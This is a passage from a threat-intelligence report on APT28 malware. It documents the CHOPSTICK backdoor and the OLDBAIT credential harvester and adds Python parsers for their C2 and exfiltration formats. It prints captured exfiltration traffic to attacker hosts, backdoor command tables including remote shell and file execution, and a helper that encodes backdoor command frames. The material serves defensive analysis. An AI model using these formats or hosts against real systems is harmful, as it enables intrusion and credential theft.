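    "00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 34 78 67 30 34 30 33 30 35 30 31"
    " 1a 00 00 00 23 00 00 00"
)
RESPONSE_BODY = b"O\x00K\x00\x00\x00AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRLVEVUV0RRRGN0bX"
COMMAND_PLAINTEXT = bytes.fromhex(
    "04 cc c2 04 00 42 42 42 42 43 43 43 43 44 44 44 44 45 45 45 45 46 46 46 46"
)

BEACON_KEY_LEN = 6                  # six-byte stream-cipher key trails the beacon
FIXED_FIELDS = 4 + 4 + 2 + 2        # campaign id, version, OS major, OS minor
TRAILER = 8                         # header-length DWORD + total-length DWORD
OK_MARKER = b"O\x00K\x00\x00\x00"   # NUL-terminated UTF-16LE "OK"
BEACON_TYPES = {0: "command request", 1: "process listing"}
COMMANDS = {  # Table 8
    1: "write %LOCALAPPDATA%\\svchost.exe and run it with CreateProcess",
    2: "write %LOCALAPPDATA%\\conhost.dll and run rundll32.exe \"<path>\",#1",
    3: "write %LOCALAPPDATA%\\conhost.dll and load it with LoadLibrary",
    4: "run the payload as shellcode on a new thread (CreateThread)",
}


def split_beacon(ciphertext: bytes):
    """Separate the encrypted beacon body from the six-byte key appended to it."""
    if len(ciphertext) <= BEACON_KEY_LEN:
        raise ValueError("beacon too short to carry a key")
    return ciphertext[:-BEACON_KEY_LEN], ciphertext[-BEACON_KEY_LEN:]


def parse_beacon(plain: bytes) -> dict:
    """Parse a decrypted beacon laid out as in Table 6. The hostname is
    variable length, so the two length DWORDs at the end are read first and
    the hostname length is derived from the header length."""
    if len(plain) < 1 + FIXED_FIELDS + TRAILER:
        raise ValueError("beacon too short")
    header_len, total_len = struct.unpack_from("<II", plain, len(plain) - TRAILER)
    if total_len != len(plain) or 1 + header_len + TRAILER != len(plain):
        raise ValueError("length fields disagree with message size")
    host_len = header_len - FIXED_FIELDS
    if plain[0] not in BEACON_TYPES:
        raise ValueError("unknown beacon type %#x" % plain[0])
    off = 1
    campaign = plain[off:off + 4].decode("ascii")
    off += 4
    hostname = plain[off:off + host_len].decode("ascii")
    off += host_len
    version = plain[off:off + 4].decode("ascii")
    off += 4
    os_major = plain[off:off + 2].decode("ascii")
    os_minor = plain[off + 2:off + 4].decode("ascii")
    return {"command": plain[0], "type": BEACON_TYPES[plain[0]], "campaign": campaign,
            "hostname": hostname, "version": version,
            "os_major": os_major, "os_minor": os_minor}


def parse_controller_response(body: bytes) -> dict:
    """Parse a response body as in Figure 12 / Table 7: the "OK" marker, then
    Base64 of a constant DWORD, two unreferenced bytes, an eight-byte key and
    the encrypted command."""
    if not body.startswith(OK_MARKER):
        raise ValueError("missing OK marker")
    raw = base64.b64decode(body[len(OK_MARKER):])
    if len(raw) < 14:
        raise ValueError("response too short")
    if struct.unpack_from("<I", raw, 0)[0] != 1:
        raise ValueError("constant field is not 1")
    return {"unknown": raw[4:6], "key": raw[6:14], "encrypted_command": raw[14:]}


def parse_command(plain: bytes):
    """Split a decrypted command into its id, the Table 8 action and the payload."""
    if not plain or plain[0] not in COMMANDS:
        raise ValueError("unknown command id")
    return plain[0], COMMANDS[plain[0]], plain[1:]


if __name__ == "__main__":
    body, key = split_beacon(BEACON_CIPHERTEXT)
    print("beacon key:", key.hex(), "| encrypted body bytes:", len(body))
    print("beacon fields:", parse_beacon(BEACON_PLAINTEXT))
    resp = parse_controller_response(RESPONSE_BODY)
    print("command key:", resp["key"].hex(), "| encrypted bytes:", len(resp["encrypted_command"]))
    cmd_id, action, payload = parse_command(COMMAND_PLAINTEXT)
    print("command", cmd_id, "->", action, "| payload:", payload.hex())
```

The length check in parse_beacon is the useful defensive step: a beacon whose trailing DWORDs do not account for every byte is either corrupt or not the format described here, and rejecting it early avoids mis-sizing the hostname field.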







APPENDIX D:
CHOPSTICK




                              CHOPSTICK is a backdoor that uses a modularized, object-oriented framework written in C++. This
                              framework allows for a diverse set of capabilities across malware variants sharing a common code base.
                              CHOPSTICK may communicate with external servers using SMTP or HTTP. This appendix documents
                              variants using HTTP communications.

The first time CHOPSTICK is executed, it may encrypt and store configuration data in the Registry key HKU\S-1-5-19_Classes\Software\Microsoft\MediaPlayer\{E6696105-E63E-4EF1-939E-15DDD83B669A}\chnnl. The user HKU\S-1-5-19 corresponds to the LOCAL_SERVICE account SID. The configuration block is encrypted using RC4 encryption. The key is a combination of a 50-byte static key and a four-byte salt value randomly generated at runtime. The static key is derived from opcodes in the backdoor.

                              CHOPSTICK collects detailed information from the host including the Windows version, CPU
                              architecture, Windows Firewall state, User Account Control (UAC) configuration settings on Windows
                              Vista and above and Internet Explorer settings. It also tests for the installation of specific security
                              products (Table 9) and applications (Table 10).



                              Table 9: Endpoint security products detected by CHOPSTICK



                              Service Name	                                        Security Product

                              Acssrv                                               Agnitum Client Security

                              AVP                                                  Kaspersky
                              SepMasterService                                     Symantec

                              McAfeeService                                        McAfee
                              AntiVirService                                       Avira
                              Ekrn                                                 ESET
                              DrWebAVService                                       Dr. Web Enterprise Security
                              MBAMService                                          Malwarebytes Anti-Malware








 Table 10: Applications detected by CHOPSTICK



 Process Name	                                               Application

 firefox.exe                                                 Mozilla Firefox

 iexplore.exe                                                Internet Explorer
 outlook.exe                                                 Microsoft Outlook

 opera.exe                                                   Opera Browser
 bat.exe                                                     Unknown
 msimn.exe                                                   Outlook Express
 vpngui.exe                                                  Cisco Anyconnect VPN client
 ipseca.exe                                                  IPsec VPN client
 ipsecc.exe                                                  IPsec VPN client
 openvpn.exe                                                 OpenVPN client
 openssl.exe                                                 OpenSSL
 openvpn-gui-1.0.3.exe                                       OpenVPN client
 msmsgs.exe                                                  Microsoft Messenger
 wuauclt.exe                                                 Windows Update
 chrome.exe                                                  Google Chrome Browser
 thebat.exe                                                  The Bat Secure Email Client
 skype.exe                                                   Skype Messenger








                             After collecting host information, CHOPSTICK creates a hidden file that may be named
                             %ALLUSERSPROFILE%\edg6EF885E2.tmp for temporary storage and creates a Windows mailslot with the
                             name “check_mes_v5555”.28 Its usage of a Windows mailslot would potentially allow external binaries to
                             write data to the “check_mes_v5555” mailslot, possibly allowing CHOPSTICK to encrypt and store
                             output from other malware. It creates a thread that records user activity on the host, capturing desktop
                             screenshots in JPEG format, tracks current window focus, collects keystrokes, and scrapes window
                             contents (text, context menus, etc.). User activity is captured once every 500 milliseconds and logged in
                             an HTML-like format. The thread writes user activity log messages to the “check_mes_v5555” mailslot in
                             plain text. CHOPSTICK reads messages from the mailslot, encrypts them using RC4, and then stores the
                             encrypted message in an edg6EF885E2.tmp temporary file. The RC4 encryption used here also uses a 50-
                             byte static key plus four-byte random salt value.

After approximately 60 seconds of execution time, CHOPSTICK begins communicating with one of its C2 servers over HTTP. After sending an initial HTTP GET request it uploads the file contents of edg6EF885E2.tmp to the C2 server using HTTP POST requests. It does not wait for a response from the server to begin uploading. Once the contents of edg6EF885E2.tmp are uploaded, CHOPSTICK deletes the file. Figure 13 below contains an example of an HTTP POST request uploading a segment from edg6EF885E2.tmp.


                                  Figure 13: Sample CHOPSTICK v2 HTTP POST




POST /search/?btnG=D-3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwH1Q&PG3pt=n-B9onK2KCi HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
                                  Host: windows-updater.com
                                  Content-Length: 77
                                  Cache-Control: no-cache


                                  1b2x7F4Rsi8_e4N_sYYpu1m7AJcgN6BzDpQYv1P2piFBLBqghXiHY3SIfe8cUHHYojeXfeyyOhw==


                             28
                               A mailslot is a Windows inter-process communication (IPC) mechanism similar to a named pipe, but is designed for one-way communications between
                               processes and can also be used across the network.






CHOPSTICK uses a URL-safe Base64 encoding, with an alphabet that replaces “+” and “/” with “-” and “_”, respectively. Each HTTP request contains multiple Base64 encoded URL parameters; however, only one parameter (“ai=”) contains information encoded by the malware, and the rest of the URL parameters appear to be randomly generated per request.

CHOPSTICK encrypts an 11-byte sequence in the “ai=” parameter. The purpose of this parameter appears to be to uniquely identify the particular instance of the backdoor to the C2 server. The Base64 encoded text of this parameter begins with a number of randomly generated alphabetical characters, presumably intended to prevent people from Base64 decoding the whole string without some knowledge of how the malware family works. Once those characters are removed and the remainder is decoded, the first four bytes of the message are an XOR key for the remainder of the data. Once decrypted using the XOR key, an 11-byte sequence is revealed. The first seven bytes are static, and are hard-coded in CHOPSTICK, while the last four bytes appear to be unique.

The message body of the POST request is also Base64 encoded. This encoded string is also prefixed with random characters designed to break the output of a Base64 decode operation on the entire string. The first 15 bytes of the decoded message body comprise a four-byte XOR key followed by another 11-byte sequence similar to the sequence stored in the “ai=” parameter as described above. Decrypting these bytes yields another static seven-byte sequence, followed by four unique bytes. The remainder of the message body consists of the RC4 encrypted data containing the HTML-formatted user activity log, edg6EF885E2.tmp.

                             After uploading edg6EF885E2.tmp, CHOPSTICK continues to query its C2 servers for commands using
                             HTTP GET requests. The malware contains code which allows it to load or memory-map external modules
                             that export the following functions: SendRawPacket, GetRawPacket, InitializeExp, DestroyExp,
                             IsActiveChannel, GetChannelInfo, SetChannelInfo, Run, GetModuleInfo, GiveMessage,
                             and TakeMessage.








                             Modularity
                             CHOPSTICK backdoors are compiled within a modularized development framework. This means that
                             two separate CHOPSTICK backdoors may contain vastly different functionality, depending on which
                             modules were included at compile time. The modules that are included in an instance of CHOPSTICK
                             may be reported to the C2 server as part of POST messages. Figure 14 includes an example from a
                             CHOPSTICK v1 variant:



                                Figure 14: Sample CHOPSTICK v1 HTTP POST including module identification




POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOPeP-PVsYh1lVAXpLhIebB4= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
                                Host: adobeincorp.com
                                Content-Length: 71
                                Cache-Control: no-cache


                                d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU=








                             To decode the POST content, the first step is to remove characters from the Base64 string (the number of
                             characters to remove may vary between different communication channels). In the example from Figure
                             14, the number of characters removed is seven. Once these characters are removed the decoded (but
                             still encrypted) text looks like this:

                             00000000 72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53 r.."..3.^@$.1.@S
                             00000010 b9 91 d0 82 ba a4 d3 ab 6c 5a 05 ec 1a f4 3e 2f ........lZ....>/
                             00000020 ff d2 ed d2 7f 53 a1 df 4f c7 b9 fa 87 88 35    .....S..O.....5


                             The first two words (“72 11” and “fd 22”) are checksums that are used to validate the message. The next 4
                             bytes “f8 dc 33 9e” are a salt value that is appended to the end of an RC4 key. Once decrypted, the
                             message looks like the following:

                             00000000 72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57 r.."..3.V4MGNxZW
                             00000010 6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee lvcmhjOG9yZQ=<<.
                             00000020 01 00 00 01 00 23 01 10 23 01 11 23 01 13 23    .....#..#..#..#


                             The strings “V4MGNxZWlvcmhjOG9yZQ” and “=<<\xee” are hardcoded in the implant. The module
                             information starts at offset 0x20 with the string “01 00 00” and is formatted as follows:



                               Table 11: Example CHOPSTICK v1 message format

                               Offset   Value                                   Description
                               00       0x0001                                  Message from the AgentKernel v1
                               02       00                                      Command ID
                               03       01 00 23 01 10 23 01 11 23 01 13 23     List of modules included in the implant, separated by a ‘#’ character








                             The modules included in this CHOPSTICK v1 implant are:



 Table 12: Example CHOPSTICK v1 module list

 Module ID   Internal Module Name   Description
 0x0001      AgentKernel            Kernel, probably version 1. Handles communication between modules and C2 tunnels.
 0x1001      modKey                 Logs keystrokes and takes screen captures.
 0x1101      modFS                  Facilitates file system access, such as directory browsing along with reading, deleting and opening files.
 0x1301      modProcRet             Remote command shell access.


                              Our determination of a CHOPSTICK “v1” versus “v2” is based on the self-identification of the kernel ID
                              and associated modules. Compare the list of CHOPSTICK v1 modules in Table 12 with the list of modules
                              in an example CHOPSTICK v2 variant in Table 13:


 Table 13: Example CHOPSTICK v2 module list

 Module ID   Internal Module Name   Description
 0x0002      kernel                 Kernel, probably version 2. Handles communication between modules and C2 tunnels.
 0x1002                             Logs keystrokes and takes screen captures.
 0x1102                             Facilitates file system access, such as directory browsing along with reading, deleting and opening files.
 0x1302                             Remote command shell access.
 0x1602                             Load additional DLLs.







                             The kernel IDs 0x0001 and 0x0002 indicate different versions. The corresponding modules in each
                             backdoor are also consistently identified with 0x01 and 0x02, respectively, in the second byte. In both
                             variants the modules with keystroke logging, file system access, and command shell capabilities carry
                             the consistent identifiers 0x10, 0x11, and 0x13, respectively, in the first byte. This suggests that the
                             first byte of the module ID identifies the module type, whereas the second byte identifies the kernel version.
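As an added example (not code from the report or from FireEye), the following Python reproduces the decoding and parsing steps described above for the Figure 14 message. It assumes the seven removed characters are the leading ones ("d2SSzFK", which also prefixes the ai= parameter of the request URL; stripping them and decoding with the URL-safe Base64 alphabet yields the first hex dump byte for byte), takes the decrypted bytes from the second hex dump because the RC4 key is not published, and applies the Table 11 layout plus the module-type/version byte split to name each module. All function and variable names are the example's own.

```python
import base64
import struct

# Added example (not FireEye's code). Constants are copied from the report's
# Figure 14 and hex dumps; function names and the checksum handling are
# assumptions of this example.

# Figure 14 POST body. The seven removed characters are assumed to be the
# leading "d2SSzFK" (the same string prefixes the ai= URL parameter);
# stripping them and URL-safe-Base64-decoding the rest reproduces the
# report's first hex dump.
FIGURE_14_BODY = "d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU="
CHANNEL_PREFIX_LEN = 7

# Decrypted message from the second hex dump (the RC4 key is not in the
# report, so decryption itself is not reproduced here).
DECRYPTED_MESSAGE = bytes.fromhex(
    "72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57 "
    "6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee "
    "01 00 00 01 00 23 01 10 23 01 11 23 01 13 23"
)

# Hardcoded strings that follow the 8-byte envelope in the decrypted message.
HARDCODED_MARKER = b"V4MGNxZWlvcmhjOG9yZQ" + b"=<<\xee"

# Module type names keyed by the first byte of the module ID (Tables 12/13).
MODULE_TYPES = {
    0x00: "kernel",
    0x10: "keystroke logger / screen capture",
    0x11: "file system access",
    0x13: "remote command shell",
    0x16: "DLL loader",
}


def strip_and_decode(body, prefix_len=CHANNEL_PREFIX_LEN):
    """Drop the per-channel prefix and Base64-decode the remainder.

    The body uses the URL-safe alphabet ('-' and '_'), so the URL-safe
    decoder is needed rather than the standard one.
    """
    return base64.urlsafe_b64decode(body[prefix_len:])


def split_envelope(raw):
    """Split a decoded blob into ((checksum1, checksum2), salt, payload).

    The checksum words and the salt are returned as raw bytes because the
    report does not state their byte order or the checksum algorithm.
    """
    return (raw[0:2], raw[2:4]), raw[4:8], raw[8:]


def parse_v1_message(plain):
    """Parse a decrypted CHOPSTICK v1 message laid out as in Table 11.

    Returns (kernel_id, command_id, [module_id, ...]). Module IDs are 16-bit
    little-endian on the wire ('01 10' -> 0x1001) and '#' (0x23) separates
    the entries; a module ID containing a 0x23 byte would confuse this
    simple split, an accepted limitation of the example.
    """
    _, _, payload = split_envelope(plain)
    if not payload.startswith(HARDCODED_MARKER):
        raise ValueError("hardcoded marker missing: wrong key or not a v1 message")
    info = payload[len(HARDCODED_MARKER):]           # offset 0x20 in the dump
    (kernel_id,) = struct.unpack("<H", info[0:2])
    command_id = info[2]
    modules = [struct.unpack("<H", m)[0] for m in info[3:].split(b"#") if m]
    return kernel_id, command_id, modules


def describe_module(module_id):
    """Return (type name, kernel version) using the byte split from the text."""
    module_type, version = module_id >> 8, module_id & 0xFF
    name = MODULE_TYPES.get(module_type, "unknown type 0x%02x" % module_type)
    return name, version


if __name__ == "__main__":
    decoded = strip_and_decode(FIGURE_14_BODY)
    checksums, salt, _ = split_envelope(decoded)
    print("checksums %s %s, salt %s" % (checksums[0].hex(), checksums[1].hex(), salt.hex()))
    kernel, cmd, mods = parse_v1_message(DECRYPTED_MESSAGE)
    print("kernel 0x%04x, command 0x%02x" % (kernel, cmd))
    for m in mods:
        print("  module 0x%04x -> %s (kernel v%d)" % ((m,) + describe_module(m)))
```

Running the block prints the checksum words 7211 and fd22, the salt f8dc339e, and the four modules of Table 12 with their types and the kernel version 1 derived from the second byte.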

                             The kernel sends commands to each module using its module ID. The commands that each module
                             understands are likely consistent from build to build. Table 14 and Table 15 show examples of commands
                             that each module understands.


                               Table 14: Commands understood by modFS (0x1101) module

                               Command ID   Description    Example
                               01           Find file      \x01\x11\x01Directory&file&[01]
                               02           Read file      \x01\x11\x02Directory&file&[01]
                               03           Write file     \x01\x11\x03Directory&file&[Contents]
                               04           Delete file    \x01\x11\x04Directory&file&[01]
                               05           Execute file   \x01\x11\x05Directory&file&[01]



                               Table 15: Commands understood by modProcRet (0x1301) module

                               Command ID   Description      Example
                               00           CMD.exe output   \x01\x13\x00[Output]
                               01           CMD.exe start    \x01\x13\x01
                               02           CMD.exe exit     \x01\x13\x02
                               11           CMD.exe input    \x01\x13\x11[Input]
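The command framing of Tables 14 and 15, as an added example (not code from the report or from FireEye): it packs and unpacks the module ID (16-bit little-endian, so 0x1101 is sent as the bytes 01 11), the command ID and the '&'-separated modFS payload, and reconstructs a transcript from a sequence of modProcRet frames so that a decrypted exchange can be reviewed. The sample frames, the field names and the reading of the trailing [01] argument as a flag byte are constructed assumptions.

```python
import struct

# Added example (not FireEye's code). Module and command IDs come from
# Tables 12, 14 and 15; sample frames and field names are constructed.

MODFS, MODPROCRET = 0x1101, 0x1301
MODULE_NAMES = {MODFS: "modFS", MODPROCRET: "modProcRet"}

MODFS_COMMANDS = {0x01: "Find file", 0x02: "Read file", 0x03: "Write file",
                  0x04: "Delete file", 0x05: "Execute file"}
MODPROCRET_COMMANDS = {0x00: "CMD.exe output", 0x01: "CMD.exe start",
                       0x02: "CMD.exe exit", 0x11: "CMD.exe input"}


def build_frame(module_id, command_id, payload=b""):
    """Encode a command as the tables show it: module ID as 16-bit
    little-endian (0x1101 -> bytes 01 11), one command byte, then payload."""
    return struct.pack("<HB", module_id, command_id) + payload


def parse_frame(frame):
    """Decode one frame into a dict an analyst can read.

    modFS payloads are split on '&' into directory, file and a trailing
    argument (file contents for Write file; the report shows '[01]' for the
    other commands, assumed here to be a flag byte). modProcRet payloads are
    passed through unchanged as shell output or input.
    """
    if len(frame) < 3:
        raise ValueError("frame too short")
    module_id, command_id = struct.unpack("<HB", frame[:3])
    payload = frame[3:]
    result = {"module": MODULE_NAMES.get(module_id, "0x%04x" % module_id),
              "command_id": command_id}
    if module_id == MODFS:
        result["command"] = MODFS_COMMANDS.get(command_id, "unknown")
        parts = payload.split(b"&", 2)
        if len(parts) != 3:
            raise ValueError("modFS payload must be directory&file&argument")
        result["directory"], result["file"], result["argument"] = parts
    elif module_id == MODPROCRET:
        result["command"] = MODPROCRET_COMMANDS.get(command_id, "unknown")
        result["data"] = payload
    else:
        result["command"] = "unknown module"
        result["data"] = payload
    return result


def reconstruct_shell_session(frames):
    """Turn a sequence of modProcRet frames into a transcript, one line per
    frame; frames for other modules are skipped."""
    lines = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed["module"] != "modProcRet":
            continue
        cmd = parsed["command_id"]
        if cmd == 0x01:
            lines.append("[shell start]")
        elif cmd == 0x02:
            lines.append("[shell exit]")
        elif cmd == 0x11:
            lines.append("> " + parsed["data"].decode("latin-1").rstrip())
        elif cmd == 0x00:
            lines.append("< " + parsed["data"].decode("latin-1").rstrip())
    return lines


# Constructed sample frames mirroring the table examples.
SAMPLE_FS_FRAME = build_frame(MODFS, 0x03, b"C:\\Users\\Public&notes.txt&hello")
SAMPLE_SHELL = [
    build_frame(MODPROCRET, 0x01),
    build_frame(MODPROCRET, 0x11, b"whoami\r\n"),
    build_frame(MODPROCRET, 0x00, b"host\\user\r\n"),
    build_frame(MODPROCRET, 0x02),
]

if __name__ == "__main__":
    print(parse_frame(SAMPLE_FS_FRAME))
    print("\n".join(reconstruct_shell_session(SAMPLE_SHELL)))
```

The transcript function is the part worth keeping in an analyst's toolbox: once the RC4 layer has been removed, the modProcRet frames in a capture read directly as the operator's shell session.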






APPENDIX E:
OLDBAIT




                             OLDBAIT is a credential harvester that installs itself in
                             %ALLUSERPROFILE%\\Application Data\Microsoft\MediaPlayer\updatewindws.exe. There is a missing
                             space in the MediaPlayer directory and the filename is missing the ‘o’ character. Both the internal
                             strings and logic are obfuscated and are unpacked at startup. Credentials for the following
                             applications are collected:

                             •	     Internet Explorer
                             •	     Mozilla Firefox
                             •	     Eudora
                             •	     The Bat! (an email client made by a Moldovan company)
                             •	     Becky! (an email client made by a Japanese company)

                             Both email and HTTP can be used to send out the collected credentials. Sample HTTP traffic is
                             displayed in Figure 15.



                                  Figure 15: Example OLDBAIT HTTP traffic




                                  POST /index.php HTTP/1.0


                                  Accept: text/html
                                  Accept-Language: en-us
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 6482
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                  Host: windous.kz
                                  Connection: Keep-Alive
                                  Pragma: no-cache


                                  prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN--cut--








                                Figure 16: Example OLDBAIT SMTP traffic




                                From: lisa.cuddy@wind0ws.kz
                                To: dr.house@wind0ws.kz
                                Subject: photo(9a3d8ea4-test)
                                Date: Tue, 23 Sep 2014 15:42:56 -0500
                                MIME-Version: 1.0
                                Content-Type: text/plain;
                                	charset="us-ascii"
                                Content-Transfer-Encoding: 7bit
                                X-Priority: 3
                                X-MSMail-Priority: Normal
                                X-Mailer: Microsoft Outlook Express 6.00.2900.2670
                                X-MimeOLE: Produced By Microsoft MimeOLE v6.00.2900.2670
                                X-Spam: Not detected
                                ===STARTPOINT===
                                qVV5KyHocV3FkUeENvu9LnVIlRB0YTa7xhoTwhRlIBBI7gRzVxikQXDRkdy4vGt1WfBtg9Utzbny
                                Uh+usXJHZ9Esecqq0UKg5Ul1O2E2OiyBTnGDPdP00UMRx/E+2it/10wQyH/epo8zuLnCuxPe7B+K
                                --cut---
                                hU+MWBLP+7h5ZojN
                                ===ENDPOINT===
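An added triage example (not code from the report or from FireEye) that recognises the two exfiltration framings shown in Figures 15 and 16: the prefs= form field in the HTTP POST body and the ===STARTPOINT=== / ===ENDPOINT=== block in the mail body. The sample messages are constructed from the figures, and generalising the photo(9a3d8ea4-test) subject to photo(<eight hex digits>-...) is an assumption of the example.

```python
import re

# Added example (not FireEye's code). The markers and the subject shape are
# taken from Figures 15 and 16; the sample messages are constructed.

SMTP_BLOCK = re.compile(r"===STARTPOINT===\r?\n(.*?)\r?\n===ENDPOINT===", re.S)
HTTP_PREFS = re.compile(r"^prefs=([A-Za-z0-9+/=_-]+)", re.M)
# Assumed generalisation of "photo(9a3d8ea4-test)": eight hex digits, a dash.
PHOTO_SUBJECT = re.compile(r"^Subject: photo\([0-9a-f]{8}-", re.M)


def extract_smtp_blob(message_text):
    """Return the encoded payload between the STARTPOINT/ENDPOINT markers
    with line breaks removed, or None when the markers are absent."""
    m = SMTP_BLOCK.search(message_text)
    if not m:
        return None
    return re.sub(r"\s+", "", m.group(1))


def extract_http_blob(body):
    """Return the value of the prefs= form field, or None."""
    m = HTTP_PREFS.search(body)
    return m.group(1) if m else None


def flag_message(message_text):
    """List the OLDBAIT exfiltration indicators a mail message shows."""
    reasons = []
    if extract_smtp_blob(message_text) is not None:
        reasons.append("STARTPOINT/ENDPOINT framed payload")
    if PHOTO_SUBJECT.search(message_text):
        reasons.append("photo(<hex id>-...) subject")
    return reasons


# Constructed samples modelled on Figures 15 and 16.
SAMPLE_MAIL = (
    "From: lisa.cuddy@wind0ws.kz\n"
    "To: dr.house@wind0ws.kz\n"
    "Subject: photo(9a3d8ea4-test)\n"
    "Content-Type: text/plain; charset=\"us-ascii\"\n"
    "\n"
    "===STARTPOINT===\n"
    "qVV5KyHocV3FkUeENvu9LnVIlRB0YTa7xhoTwhRlIBBI7gRzVxikQXDRkdy4vGt1WfBtg9Utzbny\n"
    "hU+MWBLP+7h5ZojN\n"
    "===ENDPOINT===\n"
)
SAMPLE_POST_BODY = "prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN"
BENIGN_MAIL = "Subject: lunch\n\nSee you at noon.\n"

if __name__ == "__main__":
    print(flag_message(SAMPLE_MAIL), extract_smtp_blob(SAMPLE_MAIL)[:16])
    print(flag_message(BENIGN_MAIL))
    print(extract_http_blob(SAMPLE_POST_BODY))
```

The marker pair alone is a strong enough signal for mail-gateway triage; the subject pattern is secondary and is kept as a separate reason so an analyst can see which indicator fired.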




                             OLDBAIT handles APIs very similarly to SOURFACE and EVILTOSS. There is a setup routine that loads
                             the imports into a table and all API calls reference an index to this table. In SOURFACE and EVILTOSS the
                             table is stored in a global variable while in OLDBAIT this table is allocated at runtime and a pointer is
                             passed between functions.








FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | 408.321.6300 | 877.FIREEYE (347.3393) | info@fireeye.com | www.fireeye.com


© 2014 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc.
All other brands, products, or service names are or may be trademarks or service marks of
their respective owners. SP.APT28.EN-US.102014
